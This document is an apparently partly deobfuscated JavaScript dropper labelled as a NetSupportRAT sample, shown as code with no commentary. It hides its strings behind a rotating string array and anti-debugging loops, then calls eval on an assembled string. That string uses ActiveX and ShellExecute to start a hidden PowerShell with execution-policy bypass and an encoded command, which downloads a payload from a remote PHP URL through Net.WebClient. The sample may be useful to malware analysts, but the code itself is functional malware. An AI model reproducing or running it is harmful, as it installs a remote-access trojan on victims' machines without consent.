NetSupportRAT - Obfuscated JavaScript - Deobfuscated 1

1. (function (b, W) {
2.   var B = b();
3.   while (true) {
4.     try {
5.       var N = parseInt(Y(48, 165)) / 1 + parseInt(Y(65, 124)) / 2 * (parseInt(Y(19, -379)) / 3) + parseInt(Y(24, 56)) / 4 + -parseInt(Y(23, -521)) / 5 * (parseInt(Y(104, -370)) / 6) + -parseInt(Y(68, -261)) / 7 + -parseInt(Y(28, -303)) / 8 * (parseInt(Y(56, -797)) / 9) + -parseInt(Y(67, -228)) / 10;
6.       if (N === W) {
7.         break;
8.       } else {
9.         B.push(B.shift());
10.       }
11.     } catch (q) {
12.       B.push(B.shift());
13.     }
14.   }
15. }(O, 606267));
16. var A = function () {
17.   var b = {CmVKp: function (B, N) {
18.     return B === N;
19.   }, dhUiW: Y(9, 333), JbVAq: Y(60, -876), pLoZe: function (B, N) {
20.     return B === N;
21.   }, NAFkU: "OHOkP", nmlGo: "nDrDW"};
22.   var W = true;
23.   return function (B, N) {
24.     var q = {ILmuy: function (e, I) {
25.       return b[Y(94, -360)](e, I);
26.     }, ZEqcw: b[Y(36, 997)], yJqRM: b[Y(98, -645)], JmtSj: function (e, I) {
27.       return b[Y(54, 677)](e, I);
28.     }, cTmzO: b.NAFkU};
29.     if (b[Y(88, 487)] === b.nmlGo) {
30.       var m = W ? function () {
31.         if (q.ILmuy(q[Y(45, -403)], q[Y(3, -521)])) {
32.           if (q) {
33.             var D = D[Y(108, 24)](d, arguments);
34.             Z = null;
35.             return D;
36.           }
37.         } else {
38.           if (N) {
39.             if (q.JmtSj(Y(10, -376), q[Y(51, -476)])) {
40.               var e = N[Y(108, -594)](B, arguments);
41.               N = null;
42.               return e;
43.             } else {
44.               return function (d) {}[Y(1, -438)]("while (true) {}")[Y(108, -340)]("counter");
45.             }
46.           }
47.         }
48.       } : function () {};
49.       W = false;
50.       return m;
51.     } else {
52.       return true;
53.     }
54.   };
55. }();
56. function O() {
57.   var Ej = ["xzivN", "EMVnf", "TKMJE", "qpHsS", "counter", "BsQeg", "jSVZi", "diyER", "0A>22AaQBuAGcAKA>22>2B>20>2F>2FIxqOgMKi>0D>0A>22AiAGgAdAB>30AHAA>22>2B>20>2F>2", "aEmpj", "VAfXH", "test", "hvuUh", ">0D>0A>22gB>30ACkALgBkAG>38AdwBuAGwA", "0>28FkLgcBCiVTGsmxdvpeb>2E", "FvWEp", "nmlGo", "MDYYX", "SQUdq", "qgVlR", "gger", "action", "CmVKp", "KpSDg", ">2FIxqOgMKi>0D>0A>22E>34AZQB>33AC>30ATwBiAGoAZ", "M>0D>", "JbVAq", "2FIxqOgMKi>0D>0A>22AMQBvAHQ>22>2B>20>2F>2FIxqOgMKi", "0ActiveXObject>28>22SCRiPtIng>2EfilesystemobJECt>22>29>3B>20if>2", "bwBhAGQAcwB>30AHI>22>2B>20>2F", "sQLsM", "UUQHX", "703572UzyMoT", "xufeS", "EbuFJ", "IpBML", "apply", "length", "function *\\( *\\)", "constructor", "FkzBa", "yJqRM", "kqFyP", ">2FIxqOgMKi>0D>", "FolderExists>28>22C>3A>5C", "Bybcj", "aTzWI", "dxLPY", "OHOkP", "qbIjJ", "G>34AZA>22>2B>20>2F>2FIxq", "FUmExrsgJuDvLhVadkAWOTICPXF>0D>0AoMKilXfTnLOHCUhAFBP>20>3D>20>22sheLl>22>3B>", "OgMKi>0D>0A>22BlAHgALgBwAGgAcAAiACkA>22>2C>20>22>22>2C>20>22open>22>2C>20>30>29>3B>20>7D>0D>0A>2F>2FkdbyVceRuXIHitqmTjngWxOZAG", "zWdcO", "20>2F>2FIxqOgMKi>0D>0A>22BFAFg", "GbOcN", "nQUhN", "1011759EmQrrQ", "PybAt", "chain", "Mpbyu", "25DZYdzX", "4803340ZpxPTT", "pUbcq", ">22", "20YZqOsTxnMmpABJCF>20>3D>20new>20ActiveXObject>28oMKilXfTnLOH", "24nuhbzG", "lzhVP", "Lwira", "WIOII", "replace", "AIAAoA>22>2B>20>2F", "wYRJD", "xJWUU", "dhUiW", "mGTTZ", "2B>22>20>2", "AZQBiAGMAb", "LgcBCiVTGsmxdvpe", "OTSWY", "gUWzv", "vwIZR", "uRqzM", "ZEqcw", "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)", "init", "56371UHBMAd", "22>2Fc", "stateObject", "cTmzO", "while (true) {}", "OTDiM", "pLoZe", "pYymh", "1759752YocCuj", "input", "Bcdqr", "QJSGX", "DLGuQ", "iALmo", "ABpAGUAb>22>2B>20>2F>2FIxqOgMKi", "BhxNi", "WwsZx", "4AXbKzr", "call", "1468840CAueJG", "39669lNjGPn", "yCjCK", "HWrFV", "naPSm"];
58.   O = function () {
59.     return Ej;
60.   };
61.   return O();
62. }
63. (function () {
64.   var b = {xzivN: Y(0, -399), gUWzv: function (W, B) {
65.     return W(B);
66.   }, JNjyC: Y(47, -315), FkzBa: function (W, B) {
67.     return W + B;
68.   }, VAfXH: function (W, B) {
69.     return W(B);
70.   }, Bybcj: function (W, B) {
71.     return W !== B;
72.   }, WIOII: Y(87, 344), HWrFV: Y(11, -995), KpSDg: "chain", Mpbyu: "input", aqbfU: "YfSLD", vwIZR: function (W, B) {
73.     return W === B;
74.   }, BsQeg: Y(74, -915), xufeS: function (W) {
75.     return W();
76.   }};
77.   A(this, function () {
78.     if (b[Y(7, 160)](b[Y(31, 1026)], b[Y(70, -891)])) {
79.       var W = new RegExp(b.xzivN);
80.       var B = new RegExp(Y(46, -871), "i");
81.       var N = b[Y(42, -919)](E, b.JNjyC);
82.       if (!W[Y(83, 1070)](b[Y(2, 612)](N, b[Y(95, -787)])) || !B[Y(83, 659)](N + b[Y(22, 625)])) {
83.         if (b.Bybcj(b.aqbfU, Y(34, -876))) {
84.           N("0");
85.         } else {
86.           var m = e ? function () {
87.             if (m) {
88.               var R = u.apply(h, arguments);
89.               F = null;
90.               return R;
91.             }
92.           } : function () {};
93.           G = false;
94.           return m;
95.         }
96.       } else {
97.         if (b[Y(43, -890)](b[Y(77, -625)], b.BsQeg)) {
98.           b[Y(105, -418)](E);
99.         } else {
100.           var e = new q(b[Y(72, -895)]);
101.           var I = new m(Y(46, -839), "i");
102.           var D = b.gUWzv(e, b.JNjyC);
103.           if (!e[Y(83, -810)](b[Y(2, -962)](D, Y(21, -727))) || !I.test(b[Y(2, -881)](D, Y(57, 1022)))) {
104.             D("0");
105.           } else {
106.             D();
107.           }
108.         }
109.       }
110.     } else {
111.       if (N) {
112.         return e;
113.       } else {
114.         b[Y(82, -875)](I, 0);
115.       }
116.     }
117.   })();
118. }());
119. var YLJajsi = ">2F>2" + Y(13, -99) + Y(27, 609) + "CUhAFBP>2B>22>2E>22>2B>20>2F>2FIxqOgMKi>0D>0A>22ApPlIcAtIon>22>29>3B>20Fk" + Y(40, 685) + "b>20>3D>20new>2" + Y(100, 355) + Y(86, -32) + Y(6, -124) + ">5CpROgRa>22>2B>2" + "0>2F>2FIxqOgMKi>0D>0A>22mdAta>5C>5CmIcRosOft>5C>5CwINdoWs>22>29>29>2" + "0>7B>0D>0A>2F>" + "2FYhALZvBkf" + "yGVcEPoHRNqI" + Y(97, 587) + "0AYZqOsTxnMmpABJCF>2EShellExecute>28>22cmd>22>2C>20>" + Y(49, 299) + Y(26, -104) + ">2B>20>2F>2FIxq" + "OgMKi>0D>0A>22>20Power>22>2BoMKilXfTnLOHCUhAFBP>" + Y(38, 343) + "D" + "nop>20>2Dw>20hidden>20>22>2B>20>2F>2FIxqOgMKi>0D>0A>22>2Dep>20bypaSS>20>2DenC>20SQ>22>2B>" + Y(16, 668) + Y(33, -34) + Y(96, 360) + "QBjAHQAIABOAGUAdAAuAFc" + Y(39, 641) + Y(62, -1) + Y(85, -107) + Y(101, 527) + Y(5, -114) + Y(80, -914) + "FIxqOgMKi>0D>0A>22OgAvAC>38>22" + ">2B>" + "20>2F>" + Y(99, 327) + ">0" + "D>0A>22AYQBsAC>34AYwBvAG>30ALwBpAG>34AZABlAHg" + "ALwBpA" + Y(12, 336) + Y(14, 629);
120. tuKEfrH = unescape(YLJajsi[Y(32, 636)](/\>/g, "%"));
121. function Y(E, A) {
122.   var b = O();
123.   Y = function (W, B) {
124.     W = W - 0;
125.     var N = b[W];
126.     return N;
127.   };
128.   return Y(E, A);
129. }
130. YLJajsi = eval(tuKEfrH);
131. function E(b) {
132.   var W = {zWdcO: "debu", RguDL: function (N) {
133.     return N();
134.   }, EMVnf: function (N, q) {
135.     return N === q;
136.   }, Lwira: Y(63, -72), tvMuP: function (N, q) {
137.     return N(q);
138.   }, ZElGq: Y(0, -224), kqFyP: function (N, q) {
139.     return N(q);
140.   }, sQLsM: Y(17, -862), SQUdq: function (N, q) {
141.     return N === q;
142.   }, diyER: function (N, q) {
143.     return N !== q;
144.   }, ElDVP: Y(69, -897), nQUhN: Y(76, -119), lzhVP: "NMgRb", pUbcq: "tISlQ", xJWUU: function (N, q) {
145.     return N !== q;
146.   }, aEmpj: function (N, q) {
147.     return N / q;
148.   }, pYGcF: Y(109, -840), fSumB: function (N, q) {
149.     return N % q;
150.   }, YtxWF: function (N, q) {
151.     return N !== q;
152.   }, mGTTZ: Y(103, -856), hvuUh: function (N, q) {
153.     return N + q;
154.   }, wEPJt: Y(93, -557), MDYYX: Y(41, -882), aTzWI: Y(92, -803), PybAt: "stateObject", qrCPF: Y(71, -756), jSVZi: function (N, q) {
155.     return N === q;
156.   }, QJSGX: Y(61, -769), Bcdqr: Y(44, -793)};
157.   function B(N) {
158.     var q = {SfkWs: function (m, e) {
159.       return W.tvMuP(m, e);
160.     }, qhoqJ: function (m, e) {
161.       return m === e;
162.     }, QIekA: Y(106, -188), ZXYKK: function (m, e) {
163.       return m(e);
164.     }, exPOH: W.ZElGq, eSdVT: function (m, e) {
165.       return W[Y(4, 552)](m, e);
166.     }, RTXbT: function (m, e) {
167.       return m + e;
168.     }, WwsZx: Y(57, 883), OTDiM: function (m) {
169.       return m();
170.     }};
171.     if ("qHdRH" !== W[Y(102, -213)]) {
172.       if (W[Y(90, 984)](typeof N, "string")) {
173.         if (W.diyER(W.ElDVP, "yCjCK")) {
174.           var I = N.apply(q, arguments);
175.           m = null;
176.           return I;
177.         } else {
178.           return function (e) {}[Y(1, -675)](Y(52, -283))[Y(108, 1028)](W[Y(18, -500)]);
179.         }
180.       } else {
181.         if (W[Y(29, -952)] !== W[Y(25, -944)]) {
182.           if (W[Y(35, -863)](("" + W[Y(81, -268)](N, N))[W.pYGcF], 1) || W[Y(73, -673)](W.fSumB(N, 20), 0)) {
183.             if (W.YtxWF(Y(75, -836), W[Y(37, 961)])) {
184.               (function () {
185.                 if (q.qhoqJ(q.QIekA, Y(91, 249))) {
186.                   q.SfkWs(W, "0");
187.                 } else {
188.                   return true;
189.                 }
190.               }.constructor(W[Y(84, 995)](W.zWdcO, Y(92, 970)))[Y(66, -587)](W.wEPJt));
191.             } else {
192.               (function () {
193.                 return false;
194.               }[Y(1, -422)](W[Y(15, 451)] + Y(92, -224))[Y(108, 1002)](Y(50, 405)));
195.             }
196.           } else {
197.             if (W[Y(89, -203)] !== "eEfTx") {
198.               (function () {
199.                 var I = {wWTHo: function (D) {
200.                   return W.RguDL(D);
201.                 }};
202.                 if (W[Y(73, -268)](Y(63, -175), W[Y(30, -125)])) {
203.                   return false;
204.                 } else {
205.                   I.wWTHo(W);
206.                 }
207.               }[Y(1, -411)]("debu" + W[Y(8, 395)])[Y(108, -571)](W[Y(20, -429)]));
208.             } else {
209.               return false;
210.             }
211.           }
212.         } else {
213.           q.ZXYKK(W, 0);
214.         }
215.       }
216.       B(++N);
217.     } else {
218.       var Z = {pYymh: q.exPOH, IxZcP: Y(46, -308), kWlXl: function (G, r) {
219.         return q.eSdVT(G, r);
220.       }, IpBML: function (G, r) {
221.         return q.RTXbT(G, r);
222.       }, UJXkI: q[Y(64, -918)], TDDLu: function (G) {
223.         return q[Y(53, 940)](G);
224.       }};
225.       m(this, function () {
226.         var F = new Z(Z[Y(55, 309)]);
227.         var l = new G(Z.IxZcP, "i");
228.         var R = Z.kWlXl(r, Y(47, 10));
229.         if (!F[Y(83, 332)](R + "chain") || !l.test(Z[Y(107, -686)](R, Z.UJXkI))) {
230.           R("0");
231.         } else {
232.           Z.TDDLu(v);
233.         }
234.       })();
235.     }
236.   }
237.   try {
238.     if (b) {
239.       if (W[Y(79, -548)]("naPSm", W.qrCPF)) {
240.         return W;
241.       } else {
242.         return B;
243.       }
244.     } else {
245.       if (W[Y(78, -77)](W[Y(59, -694)], W[Y(58, -735)])) {
246.         (function () {
247.           return true;
248.         }[Y(1, 157)](W.hvuUh(W[Y(15, -607)], W[Y(8, -217)]))[Y(66, -836)](Y(93, -848)));
249.       } else {
250.         B(0);
251.       }
252.     }
253.   } catch (m) {}
254. }
255.